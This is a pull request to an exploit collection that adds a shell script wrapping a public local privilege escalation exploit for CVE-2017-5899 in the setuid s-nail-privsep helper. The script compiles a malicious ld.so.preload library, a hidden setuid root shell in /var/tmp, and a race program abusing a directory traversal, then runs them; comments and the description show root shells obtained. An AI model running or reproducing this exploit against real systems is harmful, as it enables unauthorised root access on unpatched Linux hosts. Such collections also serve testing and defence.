### PR TITLE
Add CVE-2017-5899

### DIFF
--- a/CVE-2017-5899/exploit.sh
+++ b/CVE-2017-5899/exploit.sh
@@ -1,0 +1,324 @@
+#!/bin/sh
+# Wrapper for @wapiflapi's s-nail-privget.c local root exploit for CVE-2017-5899
+# uses ld.so.preload technique
+# ---
+# [~] Found privsep: /usr/lib/s-nail/s-nail-privsep
+# [.] Compiling so.c...
+# [.] Compiling rootshell.c...
+# [.] Compiling s-nail-privget.c...
+# [=] s-nail-privsep local root by @wapiflapi
+# [.] Started flood in /etc/ld.so.preload
+# [.] Started race with /usr/lib/s-nail/s-nail-privsep
+# [.] This could take a while...
+# This is a helper program of "s-nail" (in /usr/bin).
+#   It is capable of gaining more privileges than "s-nail"
+#   and will be used to create lock files.
+#   It's sole purpose is outsourcing of high privileges into
+#   fewest lines of code in order to reduce attack surface.
+#   It cannot be run by itself.
+# ...
+# [+] got root! /var/tmp/.sh (uid=0 gid=0)
+# root@ubuntu-16-04-x64:~/Desktop/snail# id
+# uid=0(root) gid=0(root) groups=0(root),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),113(lpadmin),128(sambashare),1000(test)
+# ---
+# <bcoles@gmail.com>
+# https://github.com/bcoles/local-exploits/tree/master/CVE-2017-5899
+
+rootshell="/var/tmp/.sh"
+lib="/var/tmp/.snail.so"
+
+if test -u /usr/lib/s-nail/s-nail-privsep; then
+  privsep_path="/usr/lib/s-nail/s-nail-privsep"
+elif test -u /usr/lib/mail-privsep; then
+  privsep_path="/usr/lib/mail-privsep"
+else
+  echo "[-] Could not find privsep path"
+  exit 1
+fi
+echo "[~] Found privsep: ${privsep_path}"
+
+if ! test -w .; then
+  echo '[-] working directory is not writable'
+  exit 1
+fi
+
+echo '[.] Compiling so.c...'
+
+cat << EOF > so.c
+#include <stdlib.h>
+#include <stdio.h>
+#include <unistd.h>
+
+void init(void) __attribute__((constructor));                                                             
+
+void __attribute__((constructor)) init() {
+  if (setuid(0) || setgid(0))
+    _exit(1);
+
+  unlink("/etc/ld.so.preload");
+
+  system("chown root:root ${rootshell}");
+  system("chmod u+s ${rootshell}");
+  _exit(0);
+}
+EOF
+
+if ! gcc so.c -fPIC -shared -s -o "${lib}"; then
+  echo '[-] Compiling so.c failed'
+  exit 1
+fi
+
+/bin/rm so.c
+
+echo '[.] Compiling rootshell.c...'
+
+cat << EOF > rootshell.c
+#include <stdio.h>
+#include <sys/types.h>
+#include <unistd.h>
+int main(void)
+{
+  setuid(0);
+  setgid(0);
+  execl("/bin/bash", "bash", NULL);
+}
+EOF
+
+if ! gcc rootshell.c -s -o "${rootshell}"; then
+  echo '[-] Compiling rootshell.c failed'
+  exit 1
+fi
+
+/bin/rm rootshell.c
+
+cat << EOF > s-nail-privget.c
+/*
+** 26/01/2016: s-nail-privsep local root by @wapiflapi
+** The setuid s-nail-privsep binary has a directory traversal bug.
+** This lets us be owner of a file at any location root can give us one,
+** only for a very short time though. So we have to race a bit :-)
+** Here we abuse the vuln by creating a polkit policy letting us call pkexec su.
+**
+** gcc s-nail-privget.c -o s-nail-privget
+**
+** # for ubuntu:
+** ./s-nail-privget /usr/lib/s-nail/s-nail-privsep
+** # for archlinux:
+** ./s-nail-privget /usr/lib/mail-privsep
+** ---
+** Original exploit: https://www.openwall.com/lists/oss-security/2017/01/27/7/1
+** Updated by <bcoles@gmail.com> to use ldpreload technique
+** https://github.com/bcoles/local-exploits/tree/master/CVE-2017-5899
+*/
+
+#define _GNU_SOURCE
+
+#include <unistd.h>
+#include <stdlib.h>
+#include <string.h>
+#include <stdio.h>
+#include <fcntl.h>
+
+#include <sys/inotify.h>
+#include <sys/types.h>
+#include <sys/stat.h>
+#include <sys/wait.h>
+
+#define DEBUG
+
+#ifdef DEBUG
+#  define dprintf printf
+#else
+#  define dprintf
+#endif
+
+#define ROOTSHELL "${rootshell}"
+
+int path_exists(char const *path) {
+  struct stat st;
+}
+
+/*
+** Attempts to copy data to target quickly...
+*/
+static pid_t flood(char const *target, char const *data, size_t len) {
+  pid_t child;
+
+  if ((child = fork()) != 0)
+    return child;
+
+  while (1) {
+    int fd;
+
+    if ((fd = open(target, O_WRONLY)) < 0) {
+      continue;
+    }
+
+    write(fd, data, len);
+    close(fd);
+
+    usleep(10);
+  }
+
+  return child;
+}
+
+/*
+** This triggers the vulnerability. (a lot.)
+*/
+static pid_t race(char const *path, char const *target) {
+  pid_t child;
+
+  if ((child = fork()) != 0)
+    return child;
+
+  char *argv[] = {
+    NULL, "rdotlock",
+    "mailbox",	NULL, // \$TMPDIR/foo
+    "name",	NULL, // \$TMPDIR/foo.lock
+    "hostname",	"spam",
+    "randstr",	NULL, // eggs/../../../../../../..\$TARGET
+    "pollmsecs","0",
+    NULL
+  };
+
+  char tmpdir[] = "/tmp/tmpdir.XXXXXX";
+  char *loldir;
+
+  int fd, pid, inpipe[2], outpipe[2];
+
+  if (!mkdtemp(tmpdir)) {
+    dprintf("[-] mkdtemp(%s)", tmpdir);
+    exit(EXIT_FAILURE);
+  }
+
+  if (!(argv[0] = strrchr(path, '/'))) {
+    dprintf("[-] %s is not full path to privsep.", path);
+    exit(EXIT_FAILURE);
+  }
+  argv[0] += 1; // skip '/'.
+
+  // (nope I'm not going to free those later.)
+  if (asprintf(&loldir, "%s/foo.lock.spam.eggs", tmpdir) < 0 ||
+      asprintf(&argv[3], "%s/foo", tmpdir) < 0 ||
+      asprintf(&argv[5], "%s/foo.lock", tmpdir) < 0 ||
+      asprintf(&argv[9], "eggs/../../../../../../..%s", target) < 0) {
+    dprintf("[-] asprintf() failed\n");
+    exit(EXIT_FAILURE);
+  }
+
+  // touch \$tmpdir/foo
+  if ((fd = open(argv[3], O_WRONLY | O_CREAT, 0640)) < 0) {
+    dprintf("[-] open(%s) failed\n", argv[3]);
+    exit(EXIT_FAILURE);
+  }
+  close(fd);
+
+  // mkdir \$tmpdir/foo.lock.spam.eggs
+  if (mkdir(loldir, 0755) < 0) {
+    dprintf("[-] mkdir(%s) failed\n", loldir);
+    exit(EXIT_FAILURE);
+  }
+
+  // OK, done setting up the environment & args.
+  // Setup some pipes and let's get going.
+  if (pipe(inpipe) < 0 || pipe(outpipe) < 0) {
+    dprintf("[-] pipe() failed\n");
+    exit(EXIT_FAILURE);
+  }
+
+  close(inpipe[1]);
+  close(outpipe[0]);
+
+  while (1) {
+    if ((pid = fork()) < 0) {
+      dprintf("[!] fork failed\n");
+      continue;
+    } else if (pid) {
+      waitpid(pid, NULL, 0);
+      continue;
+    }
+
+    // This is the child, give it the pipes it wants. (-_-')
+    if (dup2(inpipe[0], 0) < 0 || dup2(outpipe[1], 1) < 0) {
+      dprintf("[-] dup2() failed\n");
+      exit(EXIT_FAILURE);
+    }
+
+    if (nice(20) < 0) {
+      dprintf("[!] nice");
+    }
+
+    execv(path, argv);
+    dprintf("[-] execve(%s) failed\n", path);
+    exit(EXIT_FAILURE);
+  }
+
+  return child;
+}
+
+int main(int argc, char **argv, char **envv) {
+  char payload[] = "${lib}";
+  char const *target = "/etc/ld.so.preload";
+  char const *privsep_path = argv[1];
+  pid_t flood_pid, race_pid;
+  pid_t privsep_pid;
+  struct stat st;
+
+  if (argc != 2) {
+    dprintf("usage: %s /full/path/to/privsep\n", argv[0]);
+    exit(EXIT_FAILURE);
+  }
+
+  lstat(privsep_path, &st);
+
+  if ((long)st.st_uid != 0) {
+    dprintf("[-] privsep path is not valid: %s\n", privsep_path);
+    exit(EXIT_FAILURE);
+  }
+
+  dprintf("[=] s-nail-privsep local root by @wapiflapi\n");
+
+  if ((flood_pid = flood(target, payload, sizeof payload)) == -1) {
+    dprintf("[-] flood() failed\n");
+    exit(EXIT_FAILURE);
+  }
+
+  dprintf("[.] Started flood in %s\n", target);
+
+  if ((race_pid = race(privsep_path, target)) == -1) {
+    dprintf("[-] race() failed\n");
+    exit(EXIT_FAILURE);
+  }
+
+  dprintf("[.] Started race with %s\n", privsep_path);
+  dprintf("[.] This could take a while...\n");
+
+  do {
+    lstat(ROOTSHELL, &st);
+
+    if ((long)st.st_uid == 0) {
+      dprintf("[+] got root! %s (uid=%ld gid=%ld)\n", ROOTSHELL, (long)st.st_uid, (long)st.st_gid);
+      kill(race_pid, SIGKILL);
+      kill(flood_pid, SIGKILL);
+      break;
+    }
+
+    system(privsep_path);
+  } while ((long)st.st_uid != 0);
+
+  return system(ROOTSHELL);
+}
+EOF
+
+echo '[.] Compiling s-nail-privget.c...'
+
+if ! gcc s-nail-privget.c -s -o s-nail-privget; then
+  echo '[-] Compiling s-nail-privget.c failed'
+  exit 1
+fi
+
+/bin/rm s-nail-privget.c
+
+./s-nail-privget "${privsep_path}"
+


### PR DESCRIPTION
* https://nvd.nist.gov/vuln/detail/CVE-2017-5899
* https://www.securityfocus.com/bid/96138/info
* https://www.openwall.com/lists/oss-security/2017/01/27/7
* https://www.openwall.com/lists/oss-security/2017/01/27/7/1
* https://bugs.archlinux.org/task/52743?project=0&order=id&sort=desc&status%5B0%5D=closed&string=s-nail

```
[user@manjaro-16-10 CVE-2017-5899]$ ./exploit.sh 
[~] Found privsep: /usr/lib/mail-privsep
[.] Compiling so.c...
[.] Compiling rootshell.c...
[.] Compiling s-nail-privget.c...
[=] s-nail-privsep local root by @wapiflapi
[.] Started flood in /etc/ld.so.preload
[.] Started race with /usr/lib/mail-privsep
[.] This could take a while...
This is a helper program of "mail" (in /usr/bin).
  It is capable of gaining more privileges than "mail"
  and will be used to create lock files.
  It's sole purpose is outsourcing of high privileges into
  fewest lines of code in order to reduce attack surface.
  It cannot be run by itself.
This is a helper program of "mail" (in /usr/bin).
  It is capable of gaining more privileges than "mail"
  and will be used to create lock files.
  It's sole purpose is outsourcing of high privileges into
  fewest lines of code in order to reduce attack surface.
  It cannot be run by itself.
...
This is a helper program of "mail" (in /usr/bin).
  It is capable of gaining more privileges than "mail"
  and will be used to create lock files.
  It's sole purpose is outsourcing of high privileges into
  fewest lines of code in order to reduce attack surface.
  It cannot be run by itself.
[+] got root! /var/tmp/.sh (uid=0 gid=0)
[manjaro-16-10 CVE-2017-5899]# id
uid=0(root) gid=0(root) groups=0(root),6(disk),7(lp),10(wheel),90(network),91(video),93(optical),95(storage),96(scanner),98(power),1000(user)
[manjaro-16-10 CVE-2017-5899]# 

```